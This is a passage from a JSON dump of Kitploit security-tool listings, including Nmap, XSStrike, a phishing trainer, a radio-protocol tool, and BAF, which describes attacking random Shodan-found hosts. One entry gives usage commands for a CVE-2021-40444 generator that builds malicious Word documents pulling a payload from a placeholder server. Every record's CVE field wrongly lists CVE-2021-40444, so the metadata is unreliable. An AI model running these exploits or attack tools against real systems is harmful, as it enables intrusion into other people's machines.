\n \n \n\n\n[  ](<https://3.bp.blogspot.com/-v61mJbfoFjE/WYDvWbpEizI/AAAAAAAAIbY/2M9ZzdU_f7INSrgT8vB3NQQJURC2_xZTgCEwYBhgL/s1600/XSStrike_06.png>)\n\n \nXSStrike can also bypass WAFs \n \n\n\n[  ](<https://4.bp.blogspot.com/-D0gqGYmVVtc/WYDvWk-A_RI/AAAAAAAAIbc/GhOKd4hRT3oqCqyjJUIqvsvaCLe5vQ9swCEwYBhgL/s1600/XSStrike_07.png>)\n\n \nXSStrike supports POST method too \n \n\n\n[  ](<https://4.bp.blogspot.com/-qV5E0QeP4BQ/WYDvWyNOWGI/AAAAAAAAIbg/zBhmbV96wdoyhDGb8IfQxF3SgpxP9qA-gCEwYBhgL/s1600/XSStrike_08.png>)\n\n \nYou can also supply cookies to XSStrike \n \n\n\n[  ](<https://2.bp.blogspot.com/-JlM-1OEJu5w/WYDvXVSuF_I/AAAAAAAAIbk/YZHiAJ3xUlQMrHuPrfDXthvS62hidbPnACEwYBhgL/s1600/XSStrike_09.png>)\n\n \n** Demo video ** \n\n\n \n\n\n \n** Credits ** \nXSStrike uses code from [ BruteXSS ](<https://github.com/shawarkhanethicalhacker/BruteXSS>) and [ Intellifuzzer-XSS ](<https://github.com/matthewdfuller/intellifuzz-xss>) , [ XsSCan ](<https://github.com/The404Hacking/XsSCan>) . \n \n \n\n\n** [ Download XSStrike ](<https://github.com/UltimateHackers/XSStrike>) **\n", "cvss3": {}, "published": "2017-08-01T22:15:22", "type": "kitploit", "title": "XSStrike v1.2 - Fuzz, Crawl and Bruteforce Parameters for XSS", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-01T22:15:22", "id": "KITPLOIT:698315176468431184", "href": "http://www.kitploit.com/2017/08/xsstrike-v12-fuzz-crawl-and-bruteforce.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:06:13", "description": "The Universal Radio Hacker is a software for investigating unknown wireless protocols. 
Features include \n\n\n * ** hardware interfaces ** for common Software Defined Radios \n * ** easy demodulation ** of signals \n * ** assigning participants ** to keep overview of your data \n * ** customizable decodings ** to crack even sophisticated encodings like CC1101 data whitening \n * ** assign labels ** to reveal the logic of the protocol \n * ** fuzzing component ** to find security leaks \n * ** modulation support ** to inject the data back into the system \nCheck out the [ wiki ](<https://github.com/jopohl/urh/wiki>) for more information and supported devices. \n \n** Video ** \n \n\n\n \n** Installation ** \nUniversal Radio Hacker can be installed via _ pip _ or using the _ package manager _ of your distribution (if included). Furthermore, you can [ install urh from source ](<https://draft.blogger.com/blogger.g?blogID=8317222231133660547#installing-from-source>) or run it [ without installation ](<https://draft.blogger.com/blogger.g?blogID=8317222231133660547#without-installation>) directly from source. \n \n** Dependencies ** \n\n\n * Python 3.4+ \n * numpy / psutil / zmq \n * PyQt5 \n * C++ Compiler \n** Optional ** \n\n\n * librtlsdr (for native RTL-SDR device backend) \n * libhackrf (for native HackRF device backend) \n * libairspy (for native AirSPy device backend) \n * liblimesdr (for native LimeSDR device backend) \n * libuhd (for native USRP device backend) \n * rfcat (for RfCat plugin to send e.g. with YardStick One) \n * gnuradio / gnuradio-osmosdr (for GNU Radio device backends) \n \n** Installation examples ** \n \n** Arch Linux ** \n\n \n \n yaourt -S urh\n\n \n** Ubuntu/Debian ** \nIf you want to use native device backends, make sure you install the ** -dev ** package for your desired SDRs, that is: \n\n\n * AirSpy: ` libairspy-dev `\n * HackRF: ` libhackrf-dev `\n * RTL-SDR: ` librtlsdr-dev `\n * USRP: ` libuhd-dev `\nIf your device does not have a ` -dev ` package, e.g. 
LimeSDR, you need to manually create a symlink to the ` .so ` , like this: \n\n \n \n sudo ln -s /usr/lib/x86_64-linux-gnu/libLimeSuite.so.17.02.2 /usr/lib/x86_64-linux-gnu/libLimeSuite.so\n\n** before ** installing URH, using: \n\n \n \n sudo apt-get update\n sudo apt-get install python3-numpy python3-psutil python3-zmq python3-pyqt5 g++ libpython3-dev python3-pip\n sudo pip3 install urh\n\n \n** Gentoo/Pentoo ** \n\n \n \n emerge -av urh\n\n \n** Fedora 25+ ** \n\n \n \n dnf install urh\n\n \n** Windows ** \nIf you run Python 3.4 on Windows you need to install [ Visual C++ Build Tools 2015 ](<http://landinghub.visualstudio.com/visual-cpp-build-tools>) first. \n** It is recommended to use Python 3.5 or later on Windows, so no C++ compiler needs to be installed. ** \n\n\n 1. Install [ Python 3 for Windows ](<https://www.python.org/downloads/windows/>) . \n * Make sure you tick the _ Add Python to PATH _ checkbox on first page in Python installer. \n * Choose a ** 64 Bit ** Python version for native device support. \n 2. In a terminal, type: ` pip install urh ` . \n 3. Type ` urh ` in a terminal or search for ` urh ` in search bar to start the application. \n \n** Mac OS X ** \n\n\n 1. Install [ Python 3 for Mac OS X ](<https://www.python.org/downloads/mac-osx/>) . _ If you experience issues with preinstalled Python, make sure you update to a recent version using the given link. _\n 2. (Optional) Install desired native libs e.g. ` brew install librtlsdr ` for corresponding native device support. \n 3. In a terminal, type: ` pip3 install urh ` . \n 4. Type ` urh ` in a terminal to get it started. \n \n** Update your installation ** \nIf you installed URH via pip you can keep it up to date with \n\n \n \n pip3 install --upgrade urh\n\nIf this shouldn't work you can try: \n\n \n \n python3 -m pip install --upgrade urh\n\n \n** Running from source ** \nIf you like to live on bleeding edge, you can run URH from source. 
\n \n** Without installation ** \nTo execute the Universal Radio Hacker without installation, just run: \n\n \n \n git clone https://github.com/jopohl/urh/\n cd urh/src/urh\n ./main.py\n\nNote, before first usage the C++ extensions will be built. \n \n** Installing from source ** \nTo install from source you need to have ` python-setuptools ` installed. You can get it e.g. with ` pip install setuptools ` . Once the setuptools are installed use: \n\n \n \n git clone https://github.com/jopohl/urh/\n cd urh\n python setup.py install\n\nAnd start the application by typing ` urh ` in a terminal. \n \n** External decodings ** \nSee [ wiki ](<https://github.com/jopohl/urh/wiki/External-decodings>) for a list of external decodings provided by our community! Thanks for that! \n \n** Screenshots ** \n \n** Get the data out of raw signals ** \n\n\n[  ](<https://4.bp.blogspot.com/-Sck3GcOdQHw/WXirAGg2aMI/AAAAAAAAIZI/iMVDhN3nw7wNIITsxosCfXtLbUD6KA3SwCLcBGAs/s1600/urh_01.png>)\n\n \n** Keep an overview even on complex protocols ** \n\n\n[  ](<https://1.bp.blogspot.com/-UqgO1YxfFig/WXirEEyDJBI/AAAAAAAAIZM/ko15nk0LFWw6QNG25BzmmMmxfMt5BKZUQCLcBGAs/s1600/urh_02.png>)\n\n \n** Record and send signals ** \n\n\n[  ](<https://1.bp.blogspot.com/-W2AUxqplt74/WXirHYKRG5I/AAAAAAAAIZQ/KDqaxuiXk1Ag-IUObggaIMmXOxIo5czuQCLcBGAs/s1600/urh_03.png>)\n\n \n \n\n\n** [ Download Universal Radio Hacker ](<https://github.com/jopohl/urh>) **\n", "cvss3": {}, "published": "2017-08-04T14:11:01", "type": "kitploit", "title": "Universal Radio Hacker - Investigate Wireless Protocols Like A Boss", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-04T14:11:01", "id": "KITPLOIT:5187040326820919368", "href": "http://www.kitploit.com/2017/08/universal-radio-hacker-investigate.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-21T03:02:47", "description": "Mercure is a tool for security managers who want to teach their colleagues about phishing. 
 \n \n** What Mercure can do: ** \n\n\n * Create email templates \n * Create target lists \n * Create landing pages \n * Handle attachments \n * Let you keep track in the Campaign dashboard \n * Track email reads, landing page visits and attachment execution. \n * Harvest credentials \n \n** What Mercure will do: ** \n\n\n * Display more graphs (we like graphs!) \n * Provide a REST API \n * Allow for multi-message campaigns (aka scenarios) \n * Check browser plugins \n * User training \n \n** Docker Quickstart ** \n \n** Requirements ** \n\n\n * docker \n \n** Available configuration ** \nEnvironment variable name | Status | Description | Value example \n---|---|---|--- \nSECRET_KEY | Required | Django secret key | Random string \nURL | Required | Mercure URL | [ https://mercure.example.com ](<https://mercure.example.com/>) \nEMAIL_HOST | Required | SMTP server | mail.example.com \nEMAIL_PORT | Optional | SMTP port | 587 \nEMAIL_HOST_USER | Optional | SMTP user | [email protected] \nEMAIL_HOST_PASSWORD | Optional | SMTP password | [email protected] \nDEBUG | Optional | Run in debug mode | True \nSENTRY_DSN | Optional | Send debug info to sentry.io | [ https://23xxx: [email protected] /1234 ](<https://23xxx:38xxx@sentry.io/1234>) \nAXES_LOCK_OUT_AT_FAILURE | Optional | Ban on brute-force login | True \nAXES_COOLOFF_TIME | Optional | Ban duration on brute-force login (in hours) | 0.8333 \nDONT_SERVES_STATIC_FILE | Optional | Don't serve static files with django | True \n \n** Sample deployment ** \n\n \n \n # create container\n docker run \\\n -d \\\n --name=mercure \\\n -e SECRET_KEY=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 200 | head -n 1) \\\n -e URL=https://mercure.example.com \\\n -e EMAIL_HOST=mail.example.com \\\n -e EMAIL_PORT=587 \\\n -e [email\u00a0protected] \\\n -e [email\u00a0protected] \\\n synhackfr/mercure\n \n # create super user\n docker exec -it mercure python manage.py createsuperuser\n\n \n** Git Quickstart ** \n \n** Requirements ** \n\n\n 
* python3 \n * pip \n \n** Deployment ** \n\n \n \n git clone [email\u00a0protected]:synhack/mercure.git && cd mercure\n pip install -r requirements.txt\n ./manage.py makemigrations\n ./manage.py migrate\n ./manage.py collectstatic\n ./manage.py createsuperuser\n ./manage.py runserver\n\n \n** How to use mercure ** \nMercure is divided into 4 categories: \n\n\n * Targets \n * Email Templates \n * Attachments and landing page \n * Campaigns \nTargets, Email Templates and Campaign are the minimum required to run a basic phishing campaign. \n\n\n 1. First, add your targets \n\n\n[  ](<https://3.bp.blogspot.com/-T9iIFdtr0_k/WXgiP7FRcDI/AAAAAAAAIWY/m5LxqiB77ao9KNzJPztaUNIPhN97jvIQACLcBGAs/s1600/mercure_01.png>)\n\nYou need to fill in the mercure name and the target email. Target first and last name are optional, but can be useful for the landing page. \n\n 2. Then, fill the email template. \n\n\n[  ](<https://1.bp.blogspot.com/-kjiY-oeHyXo/WXgiYRRu-_I/AAAAAAAAIWc/Z6CnGm0vIZEucfg5lAwOC0uFwTnj38_lQCLcBGAs/s1600/mercure_02.png>)\n\nYou need to fill in the mercure name, the subject, the send and the email content. To improve the email quality, you have to fill in the email content HTML and the text content. To get information about opened email, check \"Add open email tracker\". The \"Variables\" category can help you. \nAttachments and landing page are optional; we will see them after. \n\n 3. Finally, launch the campaign \n\n\n[  ](<https://2.bp.blogspot.com/-_AmBGJJbRDE/WXgicY5na7I/AAAAAAAAIWg/A6P4R8UPFxMzwPDLd6c1KTWBkv6pg52pwCLcBGAs/s1600/mercure_03.png>)\n\nYou need to fill in the mercure name, select the email template and the target group. You can select the SMTP credentials, SSL usage or URL minimizing \n\n 4. 
Optional, add landing page \n\n\n[  ](<https://3.bp.blogspot.com/-P0-2sk8bOLE/WXgihLoBidI/AAAAAAAAIWk/tEkFvsa6zwQSIjV4V-YNETggiOpo6jnDgCLcBGAs/s1600/mercure_04.png>)\n\nYou need to fill in the mercure name and the domain to use. You can use \"Import from URL\" to copy an existing website. \nYou have to fill in the page content with text and HTML content by clicking on \"Source\" \n\n 5. Optional, add Attachment \n\n\n[  ](<https://2.bp.blogspot.com/-zTkgPNw2gqA/WXgil0Sai0I/AAAAAAAAIWo/HhrkdF7xcgEXxwEpAJQ9OV9YLSrV2ylugCLcBGAs/s1600/mercure_05.png>)\n\nYou need to fill in the mercure name, the file name which appears in the email and the file. You also have to check whether the file is buildable or not, if you need to compute a file for example. \nTo execute the build, you need to create a zip archive which contains a build script (named 'generator.sh') and a buildable file \n \n\n\n** [ Download Mercure ](<https://github.com/synhack/mercure>) **\n", "cvss3": {}, "published": "2017-08-03T22:49:09", "type": "kitploit", "title": "Mercure - A Tool For Security Managers Who Want To Train Their Colleague To Phishing", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-03T22:49:09", "id": "KITPLOIT:4033244480100620751", "href": "http://www.kitploit.com/2017/08/mercure-tool-for-security-managers-who.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T22:39:40", "description": "[  ](<https://2.bp.blogspot.com/-Y6JS7G2qSEY/WYE0RzV5iPI/AAAAAAAAIcE/a0xxwoL0lgkMobeo94eAZ5KYEbGRcelOwCLcBGAs/s1600/nmap.png>)\n\n \n\n\nNmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. 
Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer ( [ Zenmap ](<https://nmap.org/zenmap/>) ), a flexible data transfer, redirection, and debugging tool ( [ Ncat ](<https://nmap.org/ncat/>) ), a utility for comparing scan results ( [ Ndiff ](<https://nmap.org/ndiff/>) ), and a packet generation and response analysis tool ( [ Nping ](<https://nmap.org/nping/>) ). \n\n \n\n\nNmap was named \u201cSecurity Product of the Year\u201d by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in [ twelve movies ](<https://nmap.org/movies/>) , including [ The Matrix Reloaded ](<https://nmap.org/movies/#matrix>) , [ Die Hard 4 ](<https://nmap.org/movies/#diehard4>) , [ Girl With the Dragon Tattoo ](<https://nmap.org/movies/#gwtdt>) , and [ The Bourne Ultimatum ](<https://nmap.org/movies/#bourne>) . \n\n \n\n\n** Features **\n\n * ** Flexible ** : Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many [ port scanning ](<https://nmap.org/book/man-port-scanning-techniques.html>) mechanisms (both TCP & UDP), [ OS detection ](<https://nmap.org/book/osdetect.html>) , [ version detection ](<https://nmap.org/book/vscan.html>) , ping sweeps, and more. See the [ documentation page ](<https://nmap.org/docs.html>) . 
\n * ** Powerful ** : Nmap has been used to scan huge networks of literally hundreds of thousands of machines. \n * ** Portable ** : Most operating systems are supported, including Linux , Microsoft Windows , FreeBSD , OpenBSD , Solaris , IRIX , Mac OS X , HP-UX , NetBSD , Sun OS , Amiga , and more. \n * ** Easy ** : While Nmap offers a rich set of advanced features for power users, you can start out as simply as \"nmap -v -A _ targethost _ \". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source. \n * ** Free ** : The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for [ free download ](<https://nmap.org/download.html>) , and also comes with full source code that you may modify and redistribute under the terms of the [ license ](<https://nmap.org/data/COPYING>) . \n * ** Well Documented ** : Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages [ here ](<https://nmap.org/docs.html>) . \n * ** Supported ** : While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the [ Nmap mailing lists ](<https://nmap.org/#lists>) . Most bug reports and questions should be sent to the [ nmap-dev list ](<http://seclists.org/nmap-dev>) , but only after you read the [ guidelines ](<https://nmap.org/book/man-bugs.html>) . We recommend that all users subscribe to the low-traffic [ nmap-hackers ](<http://seclists.org/nmap-hackers>) announcement list. You can also find Nmap on [ Facebook ](<https://facebook.com/nmap>) and [ Twitter ](<https://twitter.com/nmap>) . 
For real-time chat, join the #nmap channel on [ Freenode ](<https://freenode.net/>) or [ EFNet ](<http://www.efnet.org/>) . \n * ** Acclaimed ** : Nmap has won numerous awards, including \"Information Security Product of the Year\" by Linux Journal , Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the [ press page ](<https://nmap.org/nmap_inthenews.html>) for further details. \n * ** Popular ** : Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities. \n\n \n\n\n** Changelog **\n\n \n\n \n \n \u2022 [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing several\n issues with installation and compatibility with the Windows 10 Creators\n Update.\n \n \u2022 [NSE][GH#910] NSE scripts now have complete SSH support via libssh2,\n including password brute-forcing and running remote commands, thanks to the\n combined efforts of three Summer of Code students: [Devin Bjelland, Sergey\n Khegay, Evangelos Deirmentzoglou]\n \n \u2022 [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579!\n They are all listed at https://nmap.org/nsedoc/, and the summaries are\n below:\n \n - ftp-syst sends SYST and STAT commands to FTP servers to get system\n version and connection information. [Daniel Miller]\n - [GH#916] http-vuln-cve2017-8917 checks for an SQL injection\n vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]\n - iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr\n Timorin, Daniel Miller]\n - [GH#915] openwebnet-discovery retrieves device identifying information\n and number of connected devices running on openwebnet protocol. 
[Rewanth\n Cool]\n - puppet-naivesigning checks for a misconfiguration in the Puppet CA\n where naive signing is enabled, allowing for any CSR to be automatically\n signed. [Wong Wai Tuck]\n - [GH#943] smb-protocols discovers if a server supports dialects NT LM\n 0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old\n smbv2-enabled script. [Paulino Calderon]\n - [GH#943] smb2-capabilities lists the supported capabilities of\n SMB2/SMB3 servers. [Paulino Calderon]\n - [GH#943] smb2-time determines the current date and boot date of SMB2\n servers. [Paulino Calderon]\n - [GH#943] smb2-security-mode determines the message signing\n configuration of SMB2/SMB3 servers. [Paulino Calderon]\n - [GH#943] smb2-vuln-uptime attempts to discover missing critical\n patches in Microsoft Windows systems based on the SMB2 server uptime.\n [Paulino Calderon]\n - ssh-auth-methods lists the authentication methods offered by an SSH\n server. [Devin Bjelland]\n - ssh-brute performs brute-forcing of SSH password credentials. [Devin\n Bjelland]\n - ssh-publickey-acceptance checks public or private keys to see if they\n could be used to log in to a target. A list of known-compromised key pairs\n is included and checked by default. [Devin Bjelland]\n - ssh-run uses user-provided credentials to run commands on targets via\n SSH. [Devin Bjelland]\n \n \u2022 [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3\n improvements. It was fully replaced by the smb-protocols script.\n \n \u2022 [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect\n (client) mode with --udp --ssl. Also added Application Layer Protocol\n Negotiation (ALPN) support with the --ssl-alpn option. [Denis Andzakovic,\n Daniel Miller]\n \n \u2022 Updated the default ciphers list for Ncat and the secure ciphers list for\n Nsock to use \"!aNULL:!eNULL\" instead of \"!ADH\". With the addition of ECDH\n ciphersuites, anonymous ECDH suites were being allowed. 
[Daniel Miller]\n \n \u2022 [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning Veritas\n Backup Exec Agent 15 or 16. [Andrew Orr]\n \n \u2022 [NSE][GH#943] Added new SMB2/3 library and related scripts. [Paulino\n Calderon]\n \n \u2022 [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames that\n resolve to unique addresses will be listed. [Aaron Heesakkers]\n \n \u2022 [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handle\n TLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]\n \n \u2022 [NSE][GH#936] Function url.escape no longer encodes so-called\n \"unreserved\" characters, including hyphen, period, underscore, and tilde,\n as per RFC 3986. [nnposter]\n \n \u2022 [NSE][GH#935] Function http.pipeline_go no longer assumes that persistent\n connections are supported on HTTP 1.0 target (unless the target explicitly\n declares otherwise), as per RFC 7230. [nnposter]\n \n \u2022 [NSE][GH#934] The HTTP response object has a new member, version, which\n contains the HTTP protocol version string returned by the server, e.g.\n \"1.0\". [nnposter]\n \n \u2022 [NSE][GH#938] Fix handling of the objectSID Active Directory attribute by\n ldap.lua. [Tom Sellers]\n \n \u2022 [NSE] Fix line endings in the list of Oracle SIDs used by\n oracle-sid-brute. Carriage Return characters were being sent in the\n connection packets, likely resulting in failure of the script. [Anant\n Shrivastava]\n \n \u2022 [NSE][GH#141] http-useragent-checker now checks for changes in HTTP\n status (usually 403 Forbidden) in addition to redirects to indicate\n forbidden User Agents. 
[Gyanendra Mishra]\n\n \n \n\n\n[ ** Download Nmap 7.60 ** ](<https://nmap.org/download.html>)\n", "cvss3": {}, "published": "2017-08-02T15:09:00", "type": "kitploit", "title": "Nmap 7.60 - Free Security Scanner For Network Exploration & Security Audits", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-02T15:09:00", "id": "KITPLOIT:2590785192528609562", "href": "http://www.kitploit.com/2017/08/nmap-760-free-security-scanner-for.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-07T12:01:40", "description": "[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\nMalicious docx [generator](<https://www.kitploit.com/search/label/Generator> \"generator\" ) to exploit CVE-2021-40444 (Microsoft Office Word [Remote](<https://www.kitploit.com/search/label/Remote> \"Remote\" ) Code Execution)\n\n \n\n\nCreation of this Script is based on some [reverse engineering](<https://www.kitploit.com/search/label/Reverse%20Engineering> \"reverse engineering\" ) over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)\n\nYou need to install lcab first (`sudo apt-get install lcab`)\n\nCheck `REPRODUCE.md` for manual reproduce steps\n\nIf your generated cab is not working, try pointing out exploit.html URL to calc.cab\n\n \n**Using** \n\n\nFirst generate a malicious docx document given a DLL, you can use the one at `test/calc.dll` which just pops a `calc.exe` from a call to `system()`\n\n`python3 exploit.py generate test/calc.dll http://<SRV IP>`\n\n \n\n\n[](<https://1.bp.blogspot.com/-SdaSc2Sass4/YUNCYPNXwRI/AAAAAAAAunc/W83xraioxaEnxgZSQFj1eb2ZTdAcBiGOQCNcBGAsYHQ/s1007/CVE-2021-40444_1_gen.png>)\n\n \n\n\nOnce you generate the malicious docx (will be at `out/`) you can setup the server:\n\n`sudo python3 exploit.py host 80`\n\n 
\n\n\n[](<https://1.bp.blogspot.com/-gTFup3vQ5eo/YUNCbV0QDBI/AAAAAAAAung/wvEOAQCmfakkFniNlJocSglFbVacX3S6QCNcBGAsYHQ/s866/CVE-2021-40444_2_srv.png>)\n\n \n\n\nFinally try the docx in a [Windows](<https://www.kitploit.com/search/label/Windows> \"Windows\" ) Virtual Machine:\n\n[](<https://1.bp.blogspot.com/-X7RGnp89UBU/YUNCQ39MNeI/AAAAAAAAunU/ZpAc4HUyWtMEl7jz_yxyLBLvvXkpbacLwCNcBGAsYHQ/s1473/CVE-2021-40444_3_calc.png>)\n\n \n\n\n**[Download CVE-2021-40444](<https://github.com/lockedbyte/CVE-2021-40444> \"Download CVE-2021-40444\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T13:13:00", "type": "kitploit", "title": "CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-16T13:13:11", "id": "KITPLOIT:3697667464193804316", "href": "http://www.kitploit.com/2021/09/cve-2021-40444-poc-malicious-docx.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-20T14:43:12", "description": "[  
](<https://2.bp.blogspot.com/-DeNDGB-ITY4/WXi0g75R6qI/AAAAAAAAIZ8/dw4CFYD0j3sligo6wlR5bAxJcdEO6_OYgCLcBGAs/s1600/BAF_01.png>)\n\n** \n** ** What is BAF ? ** \n\n\n * it's a framework written in python [2.7] that is being made specially for blind attacking , ie : attacking random targets with common security issues , targets are generated by the hackers search engine [ \"shodan\" ](<https://www.shodan.io/explore>) and vulnerable hosts are hacked in an automated way . \n\n * this framework is completely \"neutral\" ie: it's not based on shodan API and it has total dependence on web scraping , ie: the only limit on what you can do with it is your imagination as a tester & our programming skills as contributors/owners . \n\n\n \n\n\n** how to use BAF ? ** \n\n\n * fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade \n * install [ requests , httplib , urllib , time , bs4 \"BeautifulSoup\" , colored , selenium , sys ] python modules \n * python BAF_0.1.0.py \n * enter your shodan's account username and pass \n * choose 1 , let it do its job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only \n * choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port \n * that's all , till now :) \n * DON'T close a loading webpage \n * beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely \n\n \n\n\n** Screenshots ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-f33kWc8Go3g/WXi0vciPLAI/AAAAAAAAIaA/CjzkNCcnwXwB1c3RQCef_AOSIHIv5ciiwCLcBGAs/s1600/BAF_02.png>)\n\n \n\n\n[  ](<https://4.bp.blogspot.com/-DArfUxY0QsE/WXi0vZnq2uI/AAAAAAAAIaE/liF0K-d94k0tyMwV9We5B7ujocNjypJWQCLcBGAs/s1600/BAF_03.png>)\n\n \n \n\n\n** [ Download BAF ](<https://github.com/engMaher/BAF>) **\n", "cvss3": {}, "published": "2017-08-03T15:07:00", "type": "kitploit", "title": "BAF - 
Blind Attacking Framework", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2017-08-03T15:07:00", "id": "KITPLOIT:3456474172768099634", "href": "http://www.kitploit.com/2017/08/baf-blind-attacking-framework.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-20T08:38:18", "description": "[  ](<https://1.bp.blogspot.com/-aKbQJX4OmHA/WXinyzhSAqI/AAAAAAAAIY0/m0l8n-8lq_EWaS6ycx1I8lER1Mt91S78QCLcBGAs/s1600/Arachni.png>)\n\n \n\n\nArachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. \n\nIt is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives. \n\nUnlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application\u2019s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly. \n\nMoreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX. \n\nFinally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform. 
\n\n** Note ** : Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc. with the addition of custom components. \n\n \n\n\n** Arachni offers: **\n\n \n\n\n** A stable, efficient, high-performance framework **\n\n` Check ` , ` report ` and ` plugin ` developers are allowed to easily and quickly create and deploy their components with the minimum amount of restrictions imposed upon them, while provided with the necessary infrastructure to accomplish their goals. \n\nFurthermore, they are encouraged to take full advantage of the Ruby language under a unified framework that will increase their productivity without stifling them or complicating their tasks. \n\nMoreover, that same framework can be utilized as any other Ruby library and lead to the development of brand new scanners or help you create highly customized scan/audit scenarios and/or scripted scans. \n\n \n\n\n** Simplicity **\n\nAlthough some parts of the Framework are fairly complex you will never have to deal with them directly. From a user\u2019s or a component developer\u2019s point of view everything appears simple and straight-forward all the while providing power, performance and flexibility. \n\nFrom the simple command-line utility scanner to the intuitive and user-friendly Web interface and collaboration platform, Arachni follows the principle of least surprise and provides you with plenty of feedback and guidance. \n\n \n\n\n** In simple terms **\n\nArachni is designed to automatically detect security issues in web applications. All it expects is the URL of the target website and after a while it will present you with its findings. \n\n \n\n\n** Features **\n\n \n\n\n** General **\n\n * Cookie-jar/cookie-string support. \n * Custom header support. \n * SSL support with fine-grained options. \n * User Agent spoofing. \n * Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0. 
